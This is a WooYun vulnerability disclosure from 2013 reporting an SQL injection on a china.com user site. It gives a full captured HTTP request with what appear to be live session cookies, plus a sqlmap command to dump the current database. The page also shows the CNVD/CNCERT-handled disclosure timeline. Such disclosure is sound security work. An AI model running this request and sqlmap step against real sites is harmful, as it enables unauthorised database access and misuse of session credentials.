当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047105

漏洞标题:中华网某站点sql注入一枚

相关厂商:中华网

漏洞作者: 剑无名

提交时间:2013-12-26 18:32

修复时间:2014-02-09 18:33

公开时间:2014-02-09 18:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-26: 细节已通知厂商并且等待厂商处理中
2013-12-31: 厂商已经确认,细节仅向厂商公开
2014-01-10: 细节向核心白帽子及相关领域专家公开
2014-01-20: 细节向普通白帽子公开
2014-01-30: 细节向实习白帽子公开
2014-02-09: 细节向公众公开

简要描述:

我插类,中华网也是大厂商啊,果断来一发。

详细说明:

由于是这登陆的情况下的注射液,所以要抓包

GET /apps/appdisplay.php?appid=1024 HTTP/1.1
Host: u.china.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://u.china.com/photo/?_a=upload
Cookie: vjuids=337db4518.1432e49d17b.0.d9c66b3aae2328; vjlast=1388051026.1388051026.30; nickname=gainover; bindMobile=0@; CP_USER=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO0utjBCu7RHXQa50F6CqShLOrm9WqW-H7I6delCrdVyyy7MvRZMAmEiuSoRIyRV82fUda6HJVQ4pz2Lbla%2FsCjp2kSeFTQfxXmlLJ6WjemIAiC44IuLq2ow%3D%3D; CP_USERINFO=XPSgpSN8qpvtfhRe4iMyqiw5cK-771d%2FMfxGjYOOzpQ%2FCfDvh4cl%2FmDp6IZyLRinJueXkUC3gLWVPArzV8xUYSAXQvSHCSoLSAoaJgJ6BpaGLWR2kbEN20GsgmIM8GzyHkyr0o7tJc9c9KClI3yqm-fW0GJZNc3Pt8d0bGS2gLAx%2FEaNg47OlHIsABTLKcpHw9sf62kxGiSqsIw%2FPXDnvsy49-Dp0ddOqsQdBf4bEuL7OQs9lCPkpc0n-ni7rmD13jFKSRv19v2NyWJ5gDkfNZ9kP7lGrkyJ8glMiLpoHXgyqW9wAjnfpw%3D%3D; CP_USERSCORE=7zksgJwhJRB9SRBISFsdOk01s5-pOqSMkKRy2mYSdTd0JJ7dOENvccevdYmUJhGP%2F1sU81ghyZQvRW7kRTRa%2F2VlKw8R-pJZzcPUptRZyaFezc4F1uFw5X-grxu%2FKcpVL4OX72wUC7yTnUDPFO8vndwsy2e0V4sxOXkCc8j9jdn9pk8ZXBlUZg%3D%3D; CP_BLOG=%2520%26%2520%26%2520%26%2520%26%2520%264fae9fb4cd7fc658f95844e51d8fbda0; ExistRegister=48brjY3WUEk=; china_variable=jpEe7N32pYwL3PdnymLaHF9WbNhnVCnHKFQ/JQEhnVURSC4YjLrL9TBREfj5txq/RQBsuVVBzYjaVVg2itMgsI1yJyabyhcBQu2t-NJrcw0=; sns_cp_user=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO0utjBCu7RHXQa50F6CqShLOrm9WqW-H7I6delCrdVyyy7MvRZMAmEiuSoRIyRV82fUda6HJVQ4pz2Lbla%2FsCjp2kSeFTQfxXmlLJ6WjemIAiC44IuLq2ow%3D%3D; sns_login_date=2013-12-26; sns_uid=10702650; sns_hash=4069c79ad53ba569055fc929ddf11881; sns_imhash=NLoZQ8u0aHBi2aiTYYYViRaNdo90%252FtJoU1BSa9gV51O%252FsyA0kZoYKDFib4AI%252FqGPjw6q5KfTSQ8%253D; PHPSESSID=jujebdp52up49m4edc5ig9f645
Connection: keep-alive
Cache-Control: max-age=0


二哥一直是我的偶像所以一直是以gainover为测试,如果以后发现在裤子中找到这个不要埋怨我!
payload:sqlmap.py -r 1.txt --current-db

漏洞证明:

QQ图片20131226180111.jpg


嘿嘿

修复方案:

版权声明:转载请注明来源 剑无名@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-31 09:12

厂商回复:

CNVD确认并复现所述情况,已经由CNVD直接通报中华网信息化主管部门领导和工作人员(此前建立有联系渠道)。

最新状态:

暂无

漏洞评价:

评论